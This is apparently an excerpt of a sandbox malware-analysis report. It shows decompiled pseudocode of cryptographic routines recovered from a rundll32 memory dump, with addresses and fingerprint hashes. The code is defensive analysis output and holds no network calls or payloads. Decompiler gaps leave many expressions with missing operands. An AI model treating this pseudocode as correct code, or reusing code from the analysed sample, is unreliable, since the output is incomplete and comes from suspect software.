				_t317 =  >=  ? _t249 : _t316;
				_t292 = _t290 + ( >=  ? _t249 : _t316) + _t317;
				r10d = _t74;
				_t25 = _t206 + 1; // 0x2
				r8d = r10d;
				_t278 =  >=  ?  >=  ? __r11 : _t21 : _t25;
				_t251 = __rdx[6] >> 0x20;
				r9d = _t70;
				_t208 =  *__rdx >> 0x20;
				_t252 = _t251 * _t208;
				_t319 = _t317 * _t208 + _t251 * _t349;
				_t210 =  >=  ? _t252 : _t252 + 0;
				_t211 = ( >=  ? _t252 : _t252 + 0) + (_t319 >> 0x20);
				_t27 = _t211 + 1; // 0x2
				_t362 = _t360 * _t349 + (_t319 << 0x20);
				_t254 =  >=  ? _t211 : _t27;
				_t293 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362;
				_t28 = _t254 + 1; // 0x3
				_t321 = _t28;
				_t148 =  >=  ? _t254 : _t321;
				_t279 = ( >=  ?  >=  ? __r11 : _t21 : _t25) + _t148;
				_t72 = 0 | _t279 - _t148 > 0x00000000;
				_t294 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362;
				_t322 =  >=  ? _t254 : _t321;
				_t31 = _t211 + 1; // 0x1
				r10d = _t74;
				r8d = r10d;
				_t373 =  >=  ? _t211 : _t31;
				_t256 = __rdx[4] >> 0x20;
				r9d = _t72;
				_t213 = __rdx[2] >> 0x20;
				_t257 = _t256 * _t213;
				_t324 = _t322 * _t213 + _t256 * _t349;
				_t215 =  >=  ? _t257 : _t257 + 0;
				_t216 = ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20);
				_t364 = _t362 * _t349 + (_t324 << 0x20);
				_t259 =  >=  ? ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20) : ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20) + 1;
				_t295 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364;
				_t36 = _t373 + 1; // 0x2
				_t326 = _t259 + 1;
				_t154 =  >=  ? _t259 : _t326;
				_t281 = _t279 + _t322 + ( >=  ? _t259 : _t326);
				_t218 =  >=  ? _t373 : _t36;
				_t296 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364 + _t364;
				__rcx[3] = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364 + _t364;
				r11d = 0;
				_t327 =  >=  ? _t259 : _t326;
				_t282 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326);
				_t39 = _t218 + 1; // 0x3
				r9d = r8d;
				_t185 =  >=  ?  >=  ? _t373 : _t36 : _t39;
				_t75 = r9d;
				_t329 = __rdx[4] >> 0x20;
				_t260 = _t259 * _t329;
				_t331 = _t329 * _t329 + (_t260 >> 0x1f);
				_t351 = _t349 * _t349 + (_t260 << 0x21);
				_t220 =  >=  ? _t331 : _t331 + 1;
				r10d = _t75;
				_t283 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351;
				r8d = r10d;
				_t158 =  >=  ?  >=  ? _t331 : _t331 + 1 : ( >=  ? _t331 : _t331 + 1) + 1;
				_t186 = ( >=  ?  >=  ? _t373 : _t36 : _t39) + _t158;
				r9d = _t72;
				r11b = _t186 - _t158 > 0;
				_t263 = __rdx[6] >> 0x20;
				_t222 = __rdx[2] >> 0x20;
				_t264 = _t263 * _t222;
				_t333 = _t331 * _t222 + _t263 * _t351;
				_t224 =  >=  ? _t264 : _t264 + 0;
				_t225 = ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20);
				_t366 = _t364 * _t351 + (_t333 << 0x20);
				_t266 =  >=  ? ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20) : ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20) + 1;
				_t284 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366;
				_t47 = _t373 + 1; // 0x1
				_t335 = _t266 + 1;
				_t164 =  >=  ? _t266 : _t335;
				_t187 = _t186 + ( >=  ? _t266 : _t335);
				_t227 =  >=  ? _t373 : _t47;
				_t285 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366 + _t366;
				__rcx[4] = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366 + _t366;
				_t336 =  >=  ? _t266 : _t335;
				_t188 = _t186 + ( >=  ? _t266 : _t335) + _t336;
				r10d = _t75;
				_t51 = _t227 + 1; // 0x2
				r8d = r10d;
				_t375 =  >=  ?  >=  ? _t373 : _t47 : _t51;
				_t268 = __rdx[6] >> 0x20;
				r9d = _t72;
				_t229 = __rdx[4] >> 0x20;
				_t269 = _t268 * _t229;
				_t338 = _t336 * _t229 + _t268 * _t351;
				_t231 =  >=  ? _t269 : _t269 + 0;
				_t232 = ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20);
				_t368 = _t366 * _t351 + (_t338 << 0x20);
				_t271 =  >=  ? ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20) : ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20) + 1;
				_t189 = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368;
				_t233 = _t271 + 1;
				_t170 =  >=  ? _t271 : _t233;
				_t376 = ( >=  ?  >=  ? _t373 : _t47 : _t51) + _t170;
				bpl = _t376 - _t170 > 0;
				_t190 = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368 + _t368;
				__rcx[5] = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368 + _t368;
				_t234 =  >=  ? _t271 : _t233;
				r9d = r8d;
				_t58 = _t298 + 1; // 0x1
				_t377 = _t376 + ( >=  ? _t271 : _t233);
				_t370 =  >=  ? _t298 : _t58;
				_t341 = __rdx[6] >> 0x20;
				_t272 = _t271 * _t341;
				_t236 =  >=  ? _t341 * _t341 + (_t272 >> 0x1f) : _t341 * _t341 + (_t272 >> 0x1f) + 1;
				_t378 = _t376 + ( >=  ? _t271 : _t233) + _t351 * _t351 + (_t272 << 0x21);
				__rcx[6] = _t376 + ( >=  ? _t271 : _t233) + _t351 * _t351 + (_t272 << 0x21);
				_t174 =  >=  ? _t236 : _t236 + 1;
				_t175 = ( >=  ? _t236 : _t236 + 1) + ( >=  ? _t298 : _t58);
				__rcx[7] = ( >=  ? _t236 : _t236 + 1) + ( >=  ? _t298 : _t58);
				return __eax;
			}



















































































                                        0x21ef30949c0
                                        0x21ef30949c0
                                        0x21ef30949c5
                                        0x21ef30949ca
                                        0x21ef30949cf
                                        0x21ef30949e0
                                        0x21ef30949e6
                                        0x21ef30949ea
                                        0x21ef30949ed
                                        0x21ef3094a06
                                        0x21ef3094a0e
                                        0x21ef3094a11
                                        0x21ef3094a17
                                        0x21ef3094a25
                                        0x21ef3094a29
                                        0x21ef3094a2c
                                        0x21ef3094a30
                                        0x21ef3094a33
                                        0x21ef3094a37
                                        0x21ef3094a41
                                        0x21ef3094a4d
                                        0x21ef3094a56
                                        0x21ef3094a62
                                        0x21ef3094a6d
                                        0x21ef3094a73
                                        0x21ef3094a77
                                        0x21ef3094a7e
                                        0x21ef3094a85
                                        0x21ef3094a8c
                                        0x21ef3094a8f
                                        0x21ef3094a9a
                                        0x21ef3094a9d
                                        0x21ef3094aa3
                                        0x21ef3094aa7
                                        0x21ef3094aab
                                        0x21ef3094aae
                                        0x21ef3094ab9
                                        0x21ef3094abc
                                        0x21ef3094ac0
                                        0x21ef3094ac3
                                        0x21ef3094ac7
                                        0x21ef3094ade
                                        0x21ef3094ae1
                                        0x21ef3094aeb
                                        0x21ef3094aef
                                        0x21ef3094af9
                                        0x21ef3094b04
                                        0x21ef3094b0a
                                        0x21ef3094b0d
                                        0x21ef3094b10
                                        0x21ef3094b13
                                        0x21ef3094b17
                                        0x21ef3094b1a
                                        0x21ef3094b22
                                        0x21ef3094b29
                                        0x21ef3094b35
                                        0x21ef3094b3e
                                        0x21ef3094b46
                                        0x21ef3094b55
                                        0x21ef3094b5b
                                        0x21ef3094b5f
                                        0x21ef3094b65
                                        0x21ef3094b69
                                        0x21ef3094b70
                                        0x21ef3094b74
                                        0x21ef3094b7a
                                        0x21ef3094b7e
                                        0x21ef3094b84
                                        0x21ef3094b88
                                        0x21ef3094b90
                                        0x21ef3094b93
                                        0x21ef3094b99
                                        0x21ef3094b9d
                                        0x21ef3094ba0
                                        0x21ef3094ba7
                                        0x21ef3094bab
                                        0x21ef3094bb1
                                        0x21ef3094bb9
                                        0x21ef3094bc5
                                        0x21ef3094bce
                                        0x21ef3094bd6
                                        0x21ef3094be1
                                        0x21ef3094be5
                                        0x21ef3094beb
                                        0x21ef3094bef
                                        0x21ef3094bf7
                                        0x21ef3094bf7
                                        0x21ef3094bfe
                                        0x21ef3094c02
                                        0x21ef3094c08
                                        0x21ef3094c0b
                                        0x21ef3094c11
                                        0x21ef3094c15
                                        0x21ef3094c23
                                        0x21ef3094c26
                                        0x21ef3094c29
                                        0x21ef3094c31
                                        0x21ef3094c35
                                        0x21ef3094c3f
                                        0x21ef3094c47
                                        0x21ef3094c4b
                                        0x21ef3094c58
                                        0x21ef3094c60
                                        0x21ef3094c6f
                                        0x21ef3094c75
                                        0x21ef3094c79
                                        0x21ef3094c7f
                                        0x21ef3094c83
                                        0x21ef3094c8a
                                        0x21ef3094c8e
                                        0x21ef3094c94
                                        0x21ef3094c98
                                        0x21ef3094c9e
                                        0x21ef3094ca2
                                        0x21ef3094ca5
                                        0x21ef3094ca9
                                        0x21ef3094cac
                                        0x21ef3094cb7
                                        0x21ef3094cba
                                        0x21ef3094cbe
                                        0x21ef3094cc1
                                        0x21ef3094cc5
                                        0x21ef3094cdc
                                        0x21ef3094cdf
                                        0x21ef3094ced
                                        0x21ef3094cf1
                                        0x21ef3094cf4
                                        0x21ef3094cf7
                                        0x21ef3094d01
                                        0x21ef3094d09
                                        0x21ef3094d0c
                                        0x21ef3094d12
                                        0x21ef3094d16
                                        0x21ef3094d1a
                                        0x21ef3094d29
                                        0x21ef3094d2d
                                        0x21ef3094d3a
                                        0x21ef3094d42
                                        0x21ef3094d51
                                        0x21ef3094d57
                                        0x21ef3094d5b
                                        0x21ef3094d61
                                        0x21ef3094d65
                                        0x21ef3094d6c
                                        0x21ef3094d70
                                        0x21ef3094d76
                                        0x21ef3094d7a
                                        0x21ef3094d80
                                        0x21ef3094d84
                                        0x21ef3094d8c
                                        0x21ef3094d8f
                                        0x21ef3094d95
                                        0x21ef3094d99
                                        0x21ef3094d9c
                                        0x21ef3094da4
                                        0x21ef3094da8
                                        0x21ef3094db2
                                        0x21ef3094dba
                                        0x21ef3094dbe
                                        0x21ef3094dcb
                                        0x21ef3094dd3
                                        0x21ef3094de2
                                        0x21ef3094de8
                                        0x21ef3094dec
                                        0x21ef3094df2
                                        0x21ef3094df9
                                        0x21ef3094dfd
                                        0x21ef3094e03
                                        0x21ef3094e07
                                        0x21ef3094e0d
                                        0x21ef3094e15
                                        0x21ef3094e19
                                        0x21ef3094e1f
                                        0x21ef3094e23
                                        0x21ef3094e29
                                        0x21ef3094e2d
                                        0x21ef3094e31
                                        0x21ef3094e69
                                        0x21ef3094e6d
                                        0x21ef3094e73
                                        0x21ef3094e7b
                                        0x21ef3094e7f
                                        0x21ef3094e82
                                        0x21ef3094e8c

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5fc642efadc7e88c3e8254d2ef716a313fd6999f0128ad5809c6a2515237471
                                        • Instruction ID: e2b6ff21c838881c54f6e39fc2bb990f76cc48ce628736a71e5b9a7759301134
                                        • Opcode Fuzzy Hash: f5fc642efadc7e88c3e8254d2ef716a313fd6999f0128ad5809c6a2515237471
                                        • Instruction Fuzzy Hash: 6AB118E1B0179C97CE08CF8AE5669D8E39AA36CFC0395E0279E0D57B55DA7DC285C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305B5A0 Relevance: .3, Instructions: 348COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 55%
                                        			E0000021E21EF305B5A0(long long _a24, long long _a32, signed char* _a40, intOrPtr _a48) {
				signed char* _v48;
				unsigned int _v52;
				unsigned int _v56;
				void* _t98;
				void* _t101;
				signed long long _t104;
				long long _t107;
				char* _t108;
				signed char* _t110;
				char* _t113;
				signed char* _t115;
				void* _t118;
				void* _t122;
				long long _t123;
				void* _t125;
				signed char* _t126;

				_a24 = _t107;
				_a32 = _t123;
				E0000021E21EF310C220();
				r11d = r8d;
				_t108 = _t113;
				_t126 = _t110;
				if (_a48 == 0) goto 0xf305b850;
				_t115 = _a40;
				_v48 = _t115;
				r10d =  *_t115 & 0x000000ff;
				r8d = _t115[4] & 0x000000ff;
				r10d = r10d << 0x18;
				r10d = r10d | (_t115[1] & 0x000000ff) << 0x00000010;
				r8d = r8d << 0x18;
				r10d = r10d | (_t115[2] & 0x000000ff) << 0x00000008;
				r10d = r10d | _t115[3] & 0x000000ff;
				r8d = r8d | (_t115[5] & 0x000000ff) << 0x00000010;
				r8d = r8d | (_t115[6] & 0x000000ff) << 0x00000008;
				r8d = r8d | _t115[7] & 0x000000ff;
				_t101 = _t125 - 8;
				if (_t101 < 0) goto 0xf305b70e;
				r15d = _t118 + 8;
				_t98 = _t118 + _t104 * 8;
				asm("o16 nop [eax+eax]");
				_v56 = (( *_t126 & 0x000000ff) << 0x00000018 | (_t126[1] & 0x000000ff) << 0x00000010 | (_t126[2] & 0x000000ff) << 0x00000008 | _t126[3] & 0x000000ff) ^ r10d;
				_v52 = ((_t126[4] & 0x000000ff) << 0x00000018 | (_t126[5] & 0x000000ff) << 0x00000010 | (_t126[6] & 0x000000ff) << 0x00000008 | _t126[7] & 0x000000ff) ^ r8d;
				E0000021E21EF305BFF0(_t104, _t108,  &_v56, _a32, _a32, _t118, _t122, _t123);
				r10d = _v56;
				r8d = _v52;
				 *_t108 = r10d >> 0x18;
				 *((char*)(_t108 + 1)) = r10d >> 0x10;
				 *((char*)(_t108 + 2)) = r10d >> 8;
				 *((char*)(_t108 + 3)) = r10b & 0xffffffff;
				 *((char*)(_t108 + 4)) = r8d >> 0x18;
				 *((char*)(_t108 + 5)) = r8d >> 0x10;
				 *((char*)(_t108 + 6)) = r8d >> 8;
				 *((char*)(_t108 + 7)) = r8b & 0xffffffff;
				if (_t101 != 0) goto 0xf305b650;
				if (_t98 == 0xfffffff8) goto 0xf305b802;
				if (_t98 + 7 - 7 > 0) goto 0xf305b79e;
				goto __rax;
			}



















                                        0x21ef305b5a0
                                        0x21ef305b5a5
                                        0x21ef305b5b9
                                        0x21ef305b5c5
                                        0x21ef305b5c8
                                        0x21ef305b5cb
                                        0x21ef305b5ce
                                        0x21ef305b5d4
                                        0x21ef305b5dc
                                        0x21ef305b5e0
                                        0x21ef305b5e8
                                        0x21ef305b5f0
                                        0x21ef305b5f4
                                        0x21ef305b5f7
                                        0x21ef305b602
                                        0x21ef305b609
                                        0x21ef305b613
                                        0x21ef305b61d
                                        0x21ef305b624
                                        0x21ef305b627
                                        0x21ef305b629
                                        0x21ef305b633
                                        0x21ef305b640
                                        0x21ef305b647
                                        0x21ef305b687
                                        0x21ef305b6a5
                                        0x21ef305b6ac
                                        0x21ef305b6b1
                                        0x21ef305b6b8
                                        0x21ef305b6bf
                                        0x21ef305b6c7
                                        0x21ef305b6d0
                                        0x21ef305b6d7
                                        0x21ef305b6e0
                                        0x21ef305b6e9
                                        0x21ef305b6f2
                                        0x21ef305b6f9
                                        0x21ef305b704
                                        0x21ef305b711
                                        0x21ef305b72a
                                        0x21ef305b741

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1616f1bb7c7554a1bcb13969827717853a5f7c3710f740d4e99a18627326a40
                                        • Instruction ID: 9edbfb61ee081051e59fb3a5cec94e8f9203564495a552b25f48fffde4444d3c
                                        • Opcode Fuzzy Hash: b1616f1bb7c7554a1bcb13969827717853a5f7c3710f740d4e99a18627326a40
                                        • Instruction Fuzzy Hash: DAD1A0236191F08EE315CB7D48045AD7FE1E3A238974A8156EFE4D7B86C63CD616C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3051B60 Relevance: .3, Instructions: 339COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E0000021E21EF3051B60(long long _a16, long long _a24, void* _a32, signed char* _a40, intOrPtr _a48) {
				unsigned int _v52;
				unsigned int _v56;
				void* _t103;
				void* _t106;
				signed long long _t109;
				long long _t112;
				char* _t113;
				signed char* _t115;
				char* _t118;
				signed char* _t120;
				long long _t123;
				signed int _t127;
				unsigned int _t128;
				void* _t130;
				signed char* _t131;
				signed char* _t132;

				_a16 = _t112;
				_a24 = _t123;
				_a32 = _t128;
				E0000021E21EF310C220();
				r11d = r8d;
				_t113 = _t118;
				_t132 = _t115;
				if (_a48 == 0) goto 0xf3051e0e;
				_t131 = _a40;
				_t120 =  &(_t131[1]);
				r8d = _t120[3] & 0x000000ff;
				r10d =  *_t131 & 0x000000ff;
				r10d = r10d | (_t131[1] & 0x000000ff) << 0x00000008;
				r10d = r10d | (_t120[1] & 0x000000ff) << 0x00000010;
				_a40 = _t120;
				r10d = r10d | (_t120[2] & 0x000000ff) << 0x00000018;
				r8d = r8d | (_t120[4] & 0x000000ff) << 0x00000008;
				r8d = r8d | ((_t120[6] & 0x000000ff) << 0x00000008 | _t120[5] & 0x000000ff) << 0x00000010;
				_t106 = _t130 - 8;
				if (_t106 < 0) goto 0xf3051cd4;
				r15d = _t123 + 8;
				_t103 = _t123 + _t109 * 8;
				_v56 = ( *_t132 & 0x000000ff | (_t132[1] & 0x000000ff) << 0x00000008 | (_t132[2] & 0x000000ff) << 0x00000010 | (_t132[3] & 0x000000ff) << 0x00000018) ^ r10d;
				r8d = 1;
				_v52 = (_t132[4] & 0x000000ff | (_t132[5] & 0x000000ff) << 0x00000008 | (_t132[6] & 0x000000ff) << 0x00000010 | (_t132[7] & 0x000000ff) << 0x00000018) ^ r8d;
				E0000021E21EF304F380(_t109, _t113,  &_v56, _a32, _a32, _t123, _t127, _t128);
				r10d = _v56;
				r8d = _v52;
				 *_t113 = r10b & 0xffffffff;
				 *((char*)(_t113 + 1)) = r10d >> 8;
				 *((char*)(_t113 + 2)) = r10d >> 0x10;
				 *((char*)(_t113 + 3)) = r10d >> 0x18;
				 *((char*)(_t113 + 4)) = r8b & 0xffffffff;
				 *((char*)(_t113 + 5)) = r8d >> 8;
				 *((char*)(_t113 + 6)) = r8d >> 0x10;
				 *((char*)(_t113 + 7)) = r8d >> 0x18;
				if (_t106 != 0) goto 0xf3051c10;
				if (_t103 == 0xfffffff8) goto 0xf3051dce;
				if (_t103 + 7 - 7 > 0) goto 0xf3051d64;
				goto __rax;
			}



















                                        0x21ef3051b60
                                        0x21ef3051b65
                                        0x21ef3051b6a
                                        0x21ef3051b7f
                                        0x21ef3051b8b
                                        0x21ef3051b8e
                                        0x21ef3051b91
                                        0x21ef3051b94
                                        0x21ef3051b9a
                                        0x21ef3051ba8
                                        0x21ef3051bad
                                        0x21ef3051bb6
                                        0x21ef3051bbe
                                        0x21ef3051bcb
                                        0x21ef3051bce
                                        0x21ef3051bd9
                                        0x21ef3051be3
                                        0x21ef3051bef
                                        0x21ef3051bf2
                                        0x21ef3051bf4
                                        0x21ef3051bfe
                                        0x21ef3051c0b
                                        0x21ef3051c44
                                        0x21ef3051c65
                                        0x21ef3051c6b
                                        0x21ef3051c72
                                        0x21ef3051c77
                                        0x21ef3051c7f
                                        0x21ef3051c83
                                        0x21ef3051c8b
                                        0x21ef3051c94
                                        0x21ef3051c9d
                                        0x21ef3051ca4
                                        0x21ef3051cad
                                        0x21ef3051cb6
                                        0x21ef3051cbf
                                        0x21ef3051cca
                                        0x21ef3051cd7
                                        0x21ef3051cf0
                                        0x21ef3051d07

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 518610866154c911e9bacc9c7fceac0bd2731ddbd4abd23ac5feda18c1cedccd
                                        • Instruction ID: f796f312d0a8a22bb56c141b840bbb6859d8845679e24b7cd4a3f135631ade90
                                        • Opcode Fuzzy Hash: 518610866154c911e9bacc9c7fceac0bd2731ddbd4abd23ac5feda18c1cedccd
                                        • Instruction Fuzzy Hash: DFD1D1236191F08EE705CB7D48045AD7FE1E3A238974AC156EFE587B86C63CD616C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3057D20 Relevance: .3, Instructions: 338COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 47%
                                        			E0000021E21EF3057D20(long long _a24, long long _a32, signed char* _a40, intOrPtr _a48) {
				signed char* _v48;
				unsigned int _v52;
				unsigned int _v56;
				void* _t100;
				void* _t103;
				signed long long _t106;
				long long _t109;
				char* _t110;
				signed char* _t112;
				char* _t115;
				signed char* _t117;
				void* _t120;
				long long _t124;
				void* _t126;
				signed char* _t127;

				_a24 = _t109;
				_a32 = _t124;
				E0000021E21EF310C220();
				r11d = r8d;
				_t110 = _t115;
				_t127 = _t112;
				if (_a48 == 0) goto 0xf3057fbf;
				_t117 = _a40;
				_v48 = _t117;
				r10d =  *_t117 & 0x000000ff;
				r8d = _t117[4] & 0x000000ff;
				r10d = r10d | (_t117[1] & 0x000000ff) << 0x00000008;
				r10d = r10d | (_t117[2] & 0x000000ff) << 0x00000010;
				r10d = r10d | (_t117[3] & 0x000000ff) << 0x00000018;
				r8d = r8d | (_t117[5] & 0x000000ff) << 0x00000008;
				r8d = r8d | (_t117[6] & 0x000000ff) << 0x00000010;
				r8d = r8d | (_t117[7] & 0x000000ff) << 0x00000018;
				_t103 = _t126 - 8;
				if (_t103 < 0) goto 0xf3057e7f;
				r15d = _t120 + 8;
				_t100 = _t120 + _t106 * 8;
				_v56 = ( *_t127 & 0x000000ff | (_t127[1] & 0x000000ff) << 0x00000008 | (_t127[2] & 0x000000ff) << 0x00000010 | (_t127[3] & 0x000000ff) << 0x00000018) ^ r10d;
				_v52 = (_t127[4] & 0x000000ff | (_t127[5] & 0x000000ff) << 0x00000008 | (_t127[6] & 0x000000ff) << 0x00000010 | (_t127[7] & 0x000000ff) << 0x00000018) ^ r8d;
				E0000021E21EF30583D0(_t103, _t110,  &_v56, _a32, _a32, _t120,  &(_t127[8]));
				r10d = _v56;
				r8d = _v52;
				 *_t110 = r10b & 0xffffffff;
				 *((char*)(_t110 + 1)) = r10d >> 8;
				 *((char*)(_t110 + 2)) = r10d >> 0x10;
				 *((char*)(_t110 + 3)) = r10d >> 0x18;
				 *((char*)(_t110 + 4)) = r8b & 0xffffffff;
				 *((char*)(_t110 + 5)) = r8d >> 8;
				 *((char*)(_t110 + 6)) = r8d >> 0x10;
				 *((char*)(_t110 + 7)) = r8d >> 0x18;
				if (_t103 != 0) goto 0xf3057dc1;
				if (_t100 == 0xfffffff8) goto 0xf3057f73;
				if (_t100 + 7 - 7 > 0) goto 0xf3057f0f;
				goto __rax;
			}


















                                        0x21ef3057d20
                                        0x21ef3057d25
                                        0x21ef3057d39
                                        0x21ef3057d45
                                        0x21ef3057d48
                                        0x21ef3057d4b
                                        0x21ef3057d4e
                                        0x21ef3057d54
                                        0x21ef3057d5c
                                        0x21ef3057d64
                                        0x21ef3057d68
                                        0x21ef3057d70
                                        0x21ef3057d7a
                                        0x21ef3057d84
                                        0x21ef3057d8e
                                        0x21ef3057d98
                                        0x21ef3057da2
                                        0x21ef3057da5
                                        0x21ef3057da7
                                        0x21ef3057db1
                                        0x21ef3057dbe
                                        0x21ef3057df5
                                        0x21ef3057e16
                                        0x21ef3057e1d
                                        0x21ef3057e22
                                        0x21ef3057e2a
                                        0x21ef3057e2e
                                        0x21ef3057e36
                                        0x21ef3057e3f
                                        0x21ef3057e48
                                        0x21ef3057e4f
                                        0x21ef3057e58
                                        0x21ef3057e61
                                        0x21ef3057e6a
                                        0x21ef3057e75
                                        0x21ef3057e82
                                        0x21ef3057e9b
                                        0x21ef3057eb2

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7f26bff4a57c9160168a585683446cd362b5bdb692baa2ef5922b67796ddb81
                                        • Instruction ID: 85173776e3459c87aeed8ea0498029ee4f133e80536c5a84c2d8d43a378971c9
                                        • Opcode Fuzzy Hash: e7f26bff4a57c9160168a585683446cd362b5bdb692baa2ef5922b67796ddb81
                                        • Instruction Fuzzy Hash: 06D1BE23A191E08EE316CB7D48045AD7FE1E3A238974A8256EFE4C7B86C53CD616C760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305BB10 Relevance: .3, Instructions: 297COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E0000021E21EF305BB10(unsigned int __rax, long long __rbx, signed int __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, unsigned int __r8, unsigned int __r9, long long _a8, long long _a16, long long _a24) {
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				unsigned long long _t423;
				signed long long _t425;
				unsigned long long _t426;
				unsigned long long _t428;
				unsigned long long _t429;
				signed long long _t431;
				unsigned long long _t432;
				signed long long _t433;
				unsigned long long _t434;
				unsigned long long _t435;
				signed long long _t437;
				unsigned long long _t438;
				signed long long _t439;
				unsigned long long _t440;
				unsigned long long _t441;
				signed long long _t443;
				unsigned long long _t444;
				signed long long _t445;
				unsigned long long _t446;
				unsigned long long _t447;
				signed long long _t449;
				unsigned long long _t450;
				unsigned long long _t452;
				unsigned long long _t453;
				signed long long _t454;
				unsigned long long _t468;
				unsigned long long _t471;
				unsigned long long _t474;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r11d =  *__rcx;
				_t303 =  *(__rcx + 4);
				if ( *((intOrPtr*)(__rdx + 0x80)) != 0) goto 0xf305bc64;
				r8d =  *(__rdx + 0x78);
				r8d = r8d + _t303;
				asm("inc ecx");
				_t423 = __rax >> 8;
				r9d = r8d;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t423 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (__r9 >> 0x18) * 4));
				asm("rol eax, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x70)) - r11d;
				_t425 = _t423 >> 0x10 >> 8;
				_t426 = _t425 >> 0x18;
				_t304 = _t303 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t425 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t426 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t426 * 4));
				asm("rol eax, cl");
				r8d =  *(__rdx + 0x68) ^ _t304;
				_t428 = _t426 >> 8 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t428 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t428 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t428 * 4);
				asm("rol edx, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x60)) + r11d;
				_t429 = _t428 >> 8;
				_t468 = __r8 >> 0x10 >> 0x10 >> 0x18;
				_t305 = _t304 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t429 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t468 * 4));
				asm("rol eax, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x58)) - _t305;
				_t431 = _t429 >> 0x10 >> 8;
				_t432 = _t431 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t431 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t432 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t432 * 4));
				asm("rol eax, cl");
